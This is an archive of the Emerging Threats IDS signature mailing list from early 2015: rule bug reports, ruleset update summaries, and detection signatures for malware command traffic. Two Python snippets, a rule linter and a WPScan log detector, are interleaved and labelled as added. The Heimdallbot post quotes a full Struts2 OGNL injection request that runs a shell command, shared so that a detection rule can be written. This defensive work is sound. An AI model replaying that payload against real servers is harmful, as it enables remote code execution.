rmkml | 31 Jan 18:48 2015

wrong two distance on sid 2016527 rev 3

Hi,

Could you check if two distance are wrong on this sig please ?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN W32/Asprox php.dll.crp POST CnC Beacon"; flow:established,to_server; content:"POST "; depth:5; pcre:"/\r\nHost\x3a[^\r\n\x3a]+?\x3a\d{1,5}\r\n/"; content:"|0d 0a 0d 0a|id="; content:"&code="; fast_pattern; distance:0; distance:0; content:"&data="; distance:0; pcre:"/^POST \x2F[a-f0-9]{40,60}\x20/i"; reference:url,www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf; classtype:trojan-activity; sid:2016527; rev:3;)

Discovered during http://etplc.org project update.

Regards
@Rmkml
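The duplicated distance:0 reported above can be caught mechanically. This is an added example, not code from the post or from the Emerging Threats project: it tokenizes a rule's option block (respecting quotes and backslash escapes) and flags any content or pcre that carries the same relative modifier twice. The rule it checks is the one quoted in the post, re-joined onto one line, beside a constructed corrected copy.

```python
"""Lint a Snort/Suricata rule for a modifier applied twice to one content match.

Added example, not code from the post or the ET project: it tokenizes the option
block and reports a content/pcre carrying the same relative modifier (distance,
within, offset, depth) twice, the defect reported above for sid 2016527."""
RELATIVE_MODIFIERS = {"distance", "within", "offset", "depth"}

# The rule quoted in the post, re-joined onto one line (rev 3, two distance:0).
RULE_2016527 = (
    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN W32/Asprox '
    'php.dll.crp POST CnC Beacon"; flow:established,to_server; content:"POST "; depth:5; '
    'pcre:"/\\r\\nHost\\x3a[^\\r\\n\\x3a]+?\\x3a\\d{1,5}\\r\\n/"; content:"|0d 0a 0d 0a|id="; '
    'content:"&code="; fast_pattern; distance:0; distance:0; content:"&data="; distance:0; '
    'pcre:"/^POST \\x2F[a-f0-9]{40,60}\\x20/i"; reference:url,www.trendmicro.com/cloud-content/'
    'us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf; '
    'classtype:trojan-activity; sid:2016527; rev:3;)'
)
# Constructed corrected form: the stray second distance:0 removed.
RULE_2016527_FIXED = RULE_2016527.replace("distance:0; distance:0;", "distance:0;")

def split_options(rule):
    """Split the option block into (keyword, value) pairs; ';' only separates
    outside double quotes, and backslash escapes inside quotes are kept intact."""
    body = rule[rule.index("(") + 1:rule.rindex(")")]
    options, buf, in_quotes, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if in_quotes and ch == "\\" and i + 1 < len(body):
            buf.append(body[i:i + 2])  # keep escape and escaped char together
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            key, _, value = "".join(buf).strip().partition(":")
            options.append((key.strip(), value.strip()))
            buf = []
        else:
            buf.append(ch)
        i += 1
    return options

def find_duplicate_modifiers(rule):
    """Return (sid, match, keyword) for every modifier repeated on one match."""
    findings, current, seen, sid = [], None, set(), None
    for key, value in split_options(rule):
        if key == "sid":
            sid = value
        elif key in ("content", "uricontent", "pcre"):
            current, seen = value, set()  # a new match starts a fresh modifier set
        elif key in RELATIVE_MODIFIERS and current is not None:
            if key in seen:
                findings.append((current, key))
            seen.add(key)
    return [(sid, match, key) for match, key in findings]
```

Running find_duplicate_modifiers over a whole ruleset file, one rule per line, turns this into a quick pre-commit check for the same class of typo.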
rmkml | 31 Jan 18:45 2015

flow not_established error on sid 2014385 rev 6

Hi,

Could you check if flow not_established on this sig is correct please ?

alert tcp $HOME_NET 3389 -> any any (msg:"ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set"; flow:from_server,not_established; flags:SA; flowbits:isnotset,ms.rdp.synack; flowbits:set,ms.rdp.synack; flowbits:noalert; reference:cve,2012-0152; classtype:not-suspicious; sid:2014385; rev:6;)

Discovered during http://etplc.org project update.

Regards
@Rmkml
Francis Trudeau | 30 Jan 21:32 2015

Daily Ruleset Update Summary 2015/01/30

 [***] Summary: [***]

 9 new Open signatures, 22 new Pro (9 + 13).  Critroni/CTB, f0xy, MSIL/Agent.PYO.

 Thanks:  Pierre Schweitzer and @kafeine.

 [+++]          Added rules:          [+++]

 Open:

  2020333 - ET TROJAN MSIL/Agent.PYO Retrieving Update (trojan.rules)
  2020334 - ET TROJAN MSIL/Agent.PYO Retrieving Config (trojan.rules)
  2020335 - ET TROJAN MSIL/Agent.PYO Receiving Config (trojan.rules)
  2020336 - ET TROJAN MSIL/Agent.PYO Possible net.tcp CnC Beacon (stat) (trojan.rules)
  2020337 - ET TROJAN MSIL/Agent.PYO Possible net.tcp CnC Beacon (control) (trojan.rules)
  2020338 - ET WEB_SERVER WPScan User Agent (web_server.rules)
  2020339 - ET TROJAN f0xy Checkin (trojan.rules)
  2020340 - ET TROJAN f0xy Checkin (trojan.rules)
  2020341 - ET TROJAN f0xy Download (trojan.rules)

 Pro:

  2809642 - ETPRO ATTACK_RESPONSE Mimikatz Binary Transfer via HTTP (attack_response.rules)
  2809643 - ETPRO ATTACK_RESPONSE Mimikatz mimidrv.sys Filename in SMB Traffic (Unicode) (attack_response.rules)
  2809644 - ETPRO ATTACK_RESPONSE Mimikatz mimikatz.exe Filename in SMB Traffic (Unicode) (attack_response.rules)

Pierre Schweitzer | 30 Jan 10:23 2015

WPScan

Dear all,

I was wondering about the need to make an ET rule to detect WPScan
usage against a possible WordPress installation. I made the test and so
far, it remains unseen, whereas it could be a potential scan prior to an
attack.

WPScan is using a UA such as: WPScan v2.6 (http://wpscan.org)
Also, it will try to open the readme.html (or readme.txt|TXT) of the WP
installation and will also do this for any theme installed (in
wp-content/themes/*/readme.txt|TXT).

It will also try to find a suitable wp-config.php file (looking for
old/backup as well), along with the xmlrpc.php file.

I can provide the complete trace upon request.

Cheers,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
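As an added example (not the poster's trace and not an ET rule), here is a small Python check that applies the indicators above to web server access logs: the WPScan user agent plus the readme, theme readme, wp-config.php backup and xmlrpc.php probes, counted per client IP so that a single ordinary xmlrpc.php request is not flagged. The log lines and the backup-suffix pattern are constructed assumptions.

```python
"""Flag WordPress reconnaissance of the kind the post describes in access logs.

Added example, not the poster's trace or an Emerging Threats rule: it parses
combined-format log lines and, per client IP, records the WPScan user agent and
the probe paths the post lists; the sample lines below are constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
WPSCAN_UA = re.compile(r"^WPScan v[\d.]+ \(http://wpscan\.org\)")
# Probe kinds come from the post; the exact patterns (backup suffixes) are assumptions.
PROBES = {
    "readme": re.compile(r"^/readme\.(html|txt)$", re.I),
    "theme_readme": re.compile(r"^/wp-content/themes/[^/]+/readme\.txt$", re.I),
    "wp_config": re.compile(r"^/wp-config\.php(\.\w+|~)?$", re.I),
    "xmlrpc": re.compile(r"^/xmlrpc\.php$", re.I),
}
MIN_PROBE_KINDS = 3  # distinct probe kinds before a client without the UA is flagged

# Constructed sample log (RFC 5737 documentation addresses), not the poster's trace.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2015:09:58:01 +0100] "GET /readme.html HTTP/1.1" 200 7188 "-" "WPScan v2.6 (http://wpscan.org)"',
    '198.51.100.7 - - [30/Jan/2015:10:01:12 +0100] "GET /readme.html HTTP/1.1" 200 7188 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Jan/2015:10:01:13 +0100] "GET /wp-content/themes/twentyfifteen/readme.TXT HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Jan/2015:10:01:14 +0100] "GET /wp-config.php.bak HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Jan/2015:10:01:15 +0100] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [30/Jan/2015:10:03:00 +0100] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
]

def classify_path(path):
    path = path.split("?", 1)[0]  # the query string never decides the probe kind
    return next((kind for kind, rx in PROBES.items() if rx.match(path)), None)

def find_wp_recon(lines):
    """Return {ip: {"wpscan_ua": bool, "probes": [kinds], "verdict": str}}."""
    per_ip = defaultdict(lambda: {"wpscan_ua": False, "probes": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:  # malformed line: skip it rather than abort the run
            continue
        entry = per_ip[m["ip"]]
        if WPSCAN_UA.match(m["ua"]):
            entry["wpscan_ua"] = True
        kind = classify_path(m["path"])
        if kind:
            entry["probes"].add(kind)
    report = {}
    for ip, e in per_ip.items():
        verdict = ("wpscan-ua" if e["wpscan_ua"] else
                   "probe-pattern" if len(e["probes"]) >= MIN_PROBE_KINDS else None)
        if verdict:  # a lone xmlrpc.php hit is normal WordPress traffic: no entry
            report[ip] = {"wpscan_ua": e["wpscan_ua"], "probes": sorted(e["probes"]), "verdict": verdict}
    return report
```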
Francis Trudeau | 29 Jan 23:14 2015

Daily Ruleset Update Summary 2015/01/29

 [***] Summary: [***]

 4 new Open, 22 new Pro signatures (4 + 18).  D-Link DSL-2740R vuln,
SiR-DoOoM, KJw0rm, Critroni/CTB Locker, Kakfum.

 Thanks:  Eoin Miller, Wbbigdave, @rmkml, @abuse_ch, and @spookerlabs.

 [+++]          Added rules:          [+++]

 Open:

  2020329 - ET TROJAN Unknown Mailer CnC Beacon 2 (trojan.rules)
  2020330 - ET TROJAN Unknown Mailer CnC Beacon (trojan.rules)
  2020331 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (KINS CnC) (trojan.rules)
  2020332 - ET CURRENT_EVENTS Possible PHISH Dropbox - Landing Page - Title over non SSL (current_events.rules)

 Pro:

  2809624 - ETPRO EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt (exploit.rules)
  2809625 - ETPRO TROJAN VBS/Jenxcus.A Checkin (trojan.rules)
  2809626 - ETPRO TROJAN SiR-DoOoM worm User-Agent (trojan.rules)
  2809627 - ETPRO TROJAN KJw0rm User-Agent (trojan.rules)
  2809628 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon (trojan.rules)
  2809629 - ETPRO TROJAN KJw0rm CnC Beacon (trojan.rules)
  2809630 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon Response (trojan.rules)
  2809631 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809632 - ETPRO MOBILE_MALWARE Android Hideicon Download

Victor Julien | 29 Jan 18:41 2015

Suricata 2.1beta3 Available!

The OISF development team is proud to announce Suricata 2.1beta3. This
is the third beta release for the upcoming 2.1 version. It should be
considered a development snapshot for the 2.1 branch.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.1beta3.tar.gz

New features

Feature #1309: Lua support for Stats output
Feature #1310: Modbus parsing and matching

Improvements

Optimization #1339: flow timeout optimization
Optimization #1371: mpm optimization
Feature #1317: Lua: Indicator for end of flow
Feature #1333: unix-socket: allow (easier) non-root usage
Feature #1261: Request for Additional Lua Capabilities

Bug fixes

Bug #977: WARNING on empty rules file is fatal (should not be)
Bug #1184: pfring: cppcheck warnings
Bug #1321: Flow memuse bookkeeping error
Bug #1327: pcre pkt/flowvar capture broken for non-relative matches (master)
Bug #1332: cppcheck: ioctl
Bug #1336: modbus: CID 1257762: Logically dead code (DEADCODE)
Bug #1351: output-json: duplicate logging (2.1.x)
Bug #1354: coredumps on quitting on OpenBSD

Francis Trudeau | 28 Jan 23:57 2015

Daily Ruleset Update Summary 2015/01/28

 [***] Summary: [***]

 9 new Open sigs, 32 new Pro (9 + 23).  Job314/Neutrino, CVE-2015-0235
Exim vuln, Wordpress PingBack GHOST.

 Thanks: Pierre Schweitzer, Kevin Ross, @abuse_ch, and UT Austin
Information Security Office.

 [+++]          Added rules:          [+++]

 Open:

  2020320 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27 2015 (current_events.rules)
  2020321 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27 2015 (current_events.rules)
  2020322 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (KINS CnC) (trojan.rules)
  2020323 - ET WEB_SERVER Heimdallbot Attack Tool Inbound (web_server.rules)
  2020324 - ET POLICY Onion2Web Tor Proxy Cookie (policy.rules)
  2020325 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt (HELO) (exploit.rules)
  2020326 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt (HELO) (exploit.rules)
  2020327 - ET WEB_SPECIFIC_APPS Wordpress PingBack Possbile GHOST attempt (web_specific_apps.rules)
  2020328 - ET CURRENT_EVENTS Possible Dridex Campaign Download Jan 28 2014 (current_events.rules)

 Pro:

Kevin Ross | 28 Jan 16:14 2015

SIGS: ET TROJAN Symmi.22722 & ET POLICY Onion2Web Cookie

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&method="; http_uri; content:"&len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,github.com/starius/onion2web; sid:156612; rev:1;)


Kind Regards,
Kevin Ross
Pierre Schweitzer | 28 Jan 10:00 2015

Heimdallbot

Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerability exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%2
8%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about Heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also note the println in the request.

If anyone has information, or wants more queries that were made by that
bot, you are welcome.

With my best regards,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.

Attachment (smime.p7s): application/pkcs7-signature, 5783 bytes

Francis Trudeau | 27 Jan 23:23 2015

Daily Ruleset Update Summary 2015/01/27

 [***] Summary: [***]

 2 new Open signatures, 11 new Pro (2 + 9).  FerretCMS SQLi, SmartCMS
SQLi, CVE-2015-0235 Exim buffer overflow.

 Thanks: @rmkml

 [+++]          Added rules:          [+++]

 Open:

  2020315 - ET TROJAN KL-Remote / Cryp_Banker14 RAT connection (trojan.rules)
  2020316 - ET TROJAN KL-Remote / Cryp_Banker14 RAT response (trojan.rules)

 Pro:

  2809592 - ETPRO WEB_SPECIFIC_APPS FerretCMS SQLi Attempt (web_specific_apps.rules)
  2809593 - ETPRO WEB_SPECIFIC_APPS SmartCMS SQLi Attempt (web_specific_apps.rules)
  2809594 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a Uploading Info via FTP (mobile_malware.rules)
  2809595 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a Checkin (mobile_malware.rules)
  2809596 - ETPRO MOBILE_MALWARE Android.Riskware.SmsPay.EX Checkin (mobile_malware.rules)
  2809597 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt (EHLO) (exploit.rules)
  2809598 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt (HELO) (exploit.rules)
  2809599 - ETPRO TROJAN KazyBot Checkin (trojan.rules)
  2809600 - ETPRO MALWARE Win32/SoftPulse.P HTTP Request (malware.rules)

 [///]     Modified active rules:     [///]

  2014726 - ET POLICY Outdated Windows Flash Version IE (policy.rules)
  2014727 - ET POLICY Outdated Mac Flash Version (policy.rules)
  2020300 - ET CURRENT_EVENTS DRIVEBY Nuclear EK Exploit Struct Jan 23 2015 (current_events.rules)
  2808129 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.gl Checkin (mobile_malware.rules)
Olude, GB A | 27 Jan 23:17 2015

ET CURRENT_EVENTS Possible Upatre SSL Cert ventureonsite.com

Hi Folks,

 

Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?

Any info on md5 or actual upatre sample would be immensely appreciated.

 

Thanks,

GB




NOTICE: Morgan Stanley is not acting as a municipal advisor and the opinions or views contained herein are not intended to be, and do not constitute, advice within the meaning of Section 975 of the Dodd-Frank Wall Street Reform and Consumer Protection Act. If you have received this communication in error, please destroy all electronic and paper copies; do not disclose, use or act upon the information; and notify the sender immediately. Mistransmission is not intended to waive confidentiality or privilege. Morgan Stanley reserves the right, to the extent permitted under applicable law, to monitor electronic communications. This message is subject to terms available at the following link: http://www.morganstanley.com/disclaimers If you cannot access these links, please notify us by reply message and we will send the contents to you. By messaging with Morgan Stanley you consent to the foregoing.

